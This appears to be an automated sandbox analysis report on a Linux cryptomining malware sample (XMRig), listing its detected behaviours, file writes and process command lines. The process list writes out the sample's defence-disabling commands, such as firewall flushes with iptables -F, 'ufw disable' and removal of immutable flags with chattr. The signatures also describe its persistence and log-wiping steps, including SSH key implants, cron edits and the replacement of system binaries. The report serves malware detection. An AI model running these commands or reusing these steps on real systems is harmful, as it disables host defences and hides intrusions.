Malware Analysis Report

2024-10-16 05:30

Sample ID 240630-be22javbrk
Target 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
SHA256 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
Tags
xmrig antivm evasion miner persistence rootkit upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40

Threat Level: Known bad

The file 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown was found to be: Known bad.

Malicious Activity Summary

xmrig antivm evasion miner persistence rootkit upx

xmrig

XMRig Miner payload

Adds new SSH keys

Loads a kernel module

Executes dropped EXE

Writes DNS configuration

Flushes firewall rules

Deletes system logs

UPX packed file

Attempts to change immutable files

Enumerates running processes

Writes file to system bin folder

Write file to user bin folder

Creates/modifies Cron job

Reads hardware information

Disables AppArmor

Modifies rc script

Deletes log files

Disables SELinux

Checks hardware identifiers (DMI)

Changes its process name

Reads CPU attributes

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-30 01:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-30 01:04

Reported

2024-06-30 01:06

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

149s

Max time network

145s

Command Line

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Adds new SSH keys

persistence
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Deletes system logs

evasion
Description Indicator Process Target
File deleted /var/log/syslog /bin/rm N/A

Executes dropped EXE

Description Indicator Process Target
N/A /etc/zzh N/A N/A
N/A /bin/ps N/A N/A
N/A /bin/ps N/A N/A
N/A /bin/ps N/A N/A
N/A /bin/ps N/A N/A

Flushes firewall rules

Description Indicator Process Target
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A N/A N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/iptables N/A

Loads a kernel module

rootkit
Description Indicator Process Target
N/A /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko /sbin/modprobe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Writes DNS configuration

Description Indicator Process Target
File opened for modification /etc/resolv.conf /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /sbin/iptables N/A
N/A N/A N/A N/A
N/A N/A /sbin/iptables N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /lib/ufw/ufw-init N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A N/A N/A
N/A N/A /sbin/iptables N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /sbin/iptables N/A
N/A N/A /lib/systemd/systemd-sysv-install N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /sbin/ip6tables N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/xargs N/A
N/A N/A /usr/bin/xargs N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor N/A N/A

Creates/modifies Cron job

persistence
Description Indicator Process Target
File opened for modification /etc/cron.daily/logrotate /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/cron.hourly/0anacron /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/cron.d/zzh /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /etc/crontab /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Deletes log files

Description Indicator Process Target
File truncated /var/log/secure /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File truncated /var/log/wtmp /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Disables AppArmor

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A /sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A /sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A /sbin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A /usr/local/sbin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/sbin/systemctl N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/local/bin/systemctl N/A
N/A N/A /bin/systemctl N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables SELinux

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A /usr/sbin/setenforce N/A
N/A N/A /bin/grep N/A
N/A N/A /bin/grep N/A

Enumerates running processes

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.d/rc.local /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Reads hardware information

Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_serial N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor N/A N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version N/A N/A

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/bin/ip6network N/A N/A
File opened for modification /usr/bin/irqbalanced N/A N/A
File opened for modification /usr/bin/systemd-network N/A N/A
File opened for modification /usr/bin/ip6network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/kswaped /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/irqbalanced /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/rctlcli /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/systemd-network /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/pamdicks /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /usr/bin/kswaped N/A N/A
File opened for modification /usr/bin/rctlcli N/A N/A
File opened for modification /usr/bin/pamdicks N/A N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/ps N/A N/A
File opened for modification /bin/top /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/top N/A N/A
File opened for modification /bin/pstree /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /bin/pstree N/A N/A
File opened for modification /bin/ps /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself (sysv-install) N/A N/A
Changes the process name, possibly in an attempt to hide itself (sysv-install) N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo N/A N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition N/A N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/possible N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/online N/A N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map N/A N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages N/A N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages N/A N/A
File opened for reading /sys/bus/dax/devices N/A N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size N/A N/A
File opened for reading /sys/module/x_tables/initstate /sbin/modprobe N/A
File opened for reading /sys/firmware/dmi/tables/DMI N/A N/A
File opened for reading /sys/devices/virtual/dmi/id N/A N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size N/A N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size N/A N/A
File opened for reading /sys/devices/system/node/online N/A N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth N/A N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages N/A N/A
File opened for reading /sys/devices/system/node/node0/hugepages N/A N/A
File opened for reading /sys/devices/system/node/node0/cpumap N/A N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators N/A N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth N/A N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency N/A N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers N/A N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus N/A N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point N/A N/A
File opened for reading /sys/module/ip6_tables/initstate /sbin/modprobe N/A
File opened for reading /sys/devices/system/cpu N/A N/A
File opened for reading /sys/kernel/mm/hugepages N/A N/A
File opened for reading /sys/devices/system/node/node0/access1/initiators N/A N/A
File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency N/A N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size N/A N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems N/A N/A
File opened for reading /sys/devices/system/node/node0/meminfo N/A N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/1070/cmdline N/A N/A
File opened for reading /proc/179/status N/A N/A
File opened for reading /proc/27/cmdline N/A N/A
File opened for reading /proc/34/status N/A N/A
File opened for reading /proc/966/cmdline N/A N/A
File opened for reading /proc/575/stat N/A N/A
File opened for reading /proc/181/cmdline N/A N/A
File opened for reading /proc/1514/cmdline N/A N/A
File opened for reading /proc/177/status N/A N/A
File opened for reading /proc/1358/cmdline N/A N/A
File opened for reading /proc/175/status /bin/ps N/A
File opened for reading /proc/173/status /bin/ps N/A
File opened for reading /proc/532/cmdline N/A N/A
File opened for reading /proc/1140/status /bin/ps N/A
File opened for reading /proc/1512/stat /bin/ps N/A
File opened for reading /proc/1192/status N/A N/A
File opened for reading /proc/19/status N/A N/A
File opened for reading /proc/267/cmdline /bin/ps N/A
File opened for reading /proc/1239/cmdline /bin/ps N/A
File opened for reading /proc/1155/stat /bin/ps N/A
File opened for reading /proc/621/status /bin/ps N/A
File opened for reading /proc/2269/cmdline /bin/ps N/A
File opened for reading /proc/1090/status N/A N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/930/cmdline N/A N/A
File opened for reading /proc/178/status /bin/ps N/A
File opened for reading /proc/12/stat /bin/ps N/A
File opened for reading /proc/178/status N/A N/A
File opened for reading /proc/181/cmdline N/A N/A
File opened for reading /proc/11/cmdline N/A N/A
File opened for reading /proc/1090/status /bin/ps N/A
File opened for reading /proc/214/status /bin/ps N/A
File opened for reading /proc/2229/stat /bin/ps N/A
File opened for reading /proc/26/cmdline N/A N/A
File opened for reading /proc/1194/cmdline N/A N/A
File opened for reading /proc/487/status N/A N/A
File opened for reading /proc/621/status N/A N/A
File opened for reading /proc/78/status N/A N/A
File opened for reading /proc/957/status /bin/ps N/A
File opened for reading /proc/1510/status /bin/ps N/A
File opened for reading /proc/1149/status N/A N/A
File opened for reading /proc/494/status N/A N/A
File opened for reading /proc/17/status N/A N/A
File opened for reading /proc/1192/status N/A N/A
File opened for reading /proc/2028/cmdline /bin/ps N/A
File opened for reading /proc/2063/status /bin/ps N/A
File opened for reading /proc/29/stat /bin/ps N/A
File opened for reading /proc/1163/cmdline /bin/ps N/A
File opened for reading /proc/1510/status N/A N/A
File opened for reading /proc/188/stat N/A N/A
File opened for reading /proc/1094/status N/A N/A
File opened for reading /proc/180/status N/A N/A
File opened for reading /proc/1203/cmdline N/A N/A
File opened for reading /proc/1177/cmdline /bin/ps N/A
File opened for reading /proc/84/stat /bin/ps N/A
File opened for reading /proc/758/status N/A N/A
File opened for reading /proc/1317/cmdline N/A N/A
File opened for reading /proc/7/status N/A N/A
File opened for reading /proc/1153/status /bin/ps N/A
File opened for reading /proc/115/stat /bin/ps N/A
File opened for reading /proc/1113/status N/A N/A
File opened for reading /proc/173/status N/A N/A
File opened for reading /proc/sys/kernel/osrelease N/A N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.MuVwfw N/A N/A
File opened for modification /tmp/fileutl.message.AgIf9J N/A N/A
File opened for modification /tmp/fileutl.message.uUGamT N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/pixie-timer.c N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/tmp/out-grepable.o N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/in-report.c N/A N/A
File opened for modification /tmp/fileutl.message.LxwRxr N/A N/A
File opened for modification /tmp/fileutl.message.UZn8P3 N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/debian/rules N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-pop3.c N/A N/A
File opened for modification /tmp/cc4CXtyJ.s N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-snmp.h N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/rand-lcg.c N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/vs10/masscan.sln N/A N/A
File opened for modification /tmp/ccB3fnFB.s N/A N/A
File opened for modification /tmp/ccTGC8Xv.s N/A N/A
File opened for modification /tmp/ccpJnzPq.s N/A N/A
File opened for modification /tmp/fileutl.message.liAVC7 N/A N/A
File opened for modification /tmp/fileutl.message.IlkXys N/A N/A
File opened for modification /tmp/fileutl.message.1xiwfz N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/script.h N/A N/A
File opened for modification /tmp/fileutl.message.70VR57 N/A N/A
File opened for modification /tmp/fileutl.message.AwcAfN N/A N/A
File opened for modification /tmp/fileutl.message.SZVvQU N/A N/A
File opened for modification /tmp/ccC4H6YK.s N/A N/A
File opened for modification /tmp/fileutl.message.lEo8eM N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/debian/source/format N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/pixie-backtrace.c N/A N/A
File opened for modification /tmp/dev/null /tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown N/A
File opened for modification /tmp/fileutl.message.Of9lVQ N/A N/A
File opened for modification /tmp/fileutl.message.z8OtLB N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/out-grepable.c N/A N/A
File opened for modification /tmp/ccQZfx7j.s N/A N/A
File opened for modification /tmp/fileutl.message.JfIrND N/A N/A
File opened for modification /tmp/fileutl.message.exJ7Z8 N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-arp.h N/A N/A
File opened for modification /tmp/fileutl.message.VLIfBN N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-banout.h N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/rawsock-pcap.h N/A N/A
File opened for modification /tmp/ccpJnzPq.s N/A N/A
File opened for modification /tmp/fileutl.message.CnSCoN N/A N/A
File opened for modification /tmp/fileutl.message.bwo05M N/A N/A
File opened for modification /tmp/fileutl.message.4S3zXo N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/smackqueue.h N/A N/A
File opened for modification /tmp/fileutl.message.6ECiPt N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/in-binary.h N/A N/A
File opened for modification /tmp/ccE6aJr5.s N/A N/A
File opened for modification /tmp/ccaAtBfi.s N/A N/A
File opened for modification /tmp/fileutl.message.gcvUqT N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/rawsock-pcapfile.c N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/script-ntp-monlist.c N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/tmp/proto-pop3.o N/A N/A
File opened for modification /tmp/fileutl.message.qlOK8I N/A N/A
File opened for modification /tmp/fileutl.message.VcFTuJ N/A N/A
File opened for modification /tmp/fileutl.message.rJ4anc N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-ssl.h N/A N/A
File opened for modification /tmp/fileutl.message.hPpPr8 N/A N/A
File opened for modification /tmp/fileutl.message.29Rjpx N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/pixie-file.h N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-imap4.h N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/templ-pkt.h N/A N/A
File opened for modification /tmp/.ice-unix/.../masscan-1.0.4/src/proto-netbios.h N/A N/A
File opened for modification /tmp/ccgpLdvG.s N/A N/A
File opened for modification /tmp/fileutl.message.qmHSpw N/A N/A

Processes

/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown

[/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown]

/bin/chmod

[chmod 777 /usr/bin/chattr]

/bin/chmod

[chmod 777 /bin/chattr]

/usr/bin/chattr

[chattr -iua /tmp/]

/usr/bin/chattr

[chattr -iua /var/tmp/]

/sbin/iptables

[iptables -F]

/usr/sbin/ufw

[ufw disable]

/sbin/iptables

[/sbin/iptables -V]

/lib/ufw/ufw-init

[/lib/ufw/ufw-init force-stop]

/sbin/ip6tables

[ip6tables -L INPUT -n]

/sbin/modprobe

[/sbin/modprobe ip6_tables]

/sbin/iptables

[iptables -F ufw-logging-deny]

/sbin/iptables

[iptables -F ufw-logging-allow]

/sbin/iptables

[iptables -F ufw-not-local]

/sbin/iptables

[iptables -F ufw-user-logging-input]

/sbin/iptables

[iptables -F ufw-user-limit-accept]

/sbin/iptables

[iptables -F ufw-user-limit]

/sbin/iptables

[iptables -F ufw-skip-to-policy-input]

/sbin/iptables

[iptables -F ufw-reject-input]

/sbin/iptables

[iptables -F ufw-after-logging-input]

/sbin/iptables

[iptables -F ufw-after-input]

/sbin/iptables

[iptables -F ufw-user-input]

/sbin/iptables

[iptables -F ufw-before-input]

/sbin/iptables

[iptables -F ufw-before-logging-input]

/sbin/iptables

[iptables -F ufw-skip-to-policy-forward]

/sbin/iptables

[iptables -F ufw-reject-forward]

/sbin/iptables

[iptables -F ufw-after-logging-forward]

/sbin/iptables

[iptables -F ufw-after-forward]

/sbin/iptables

[iptables -F ufw-user-logging-forward]

/sbin/iptables

[iptables -F ufw-user-forward]

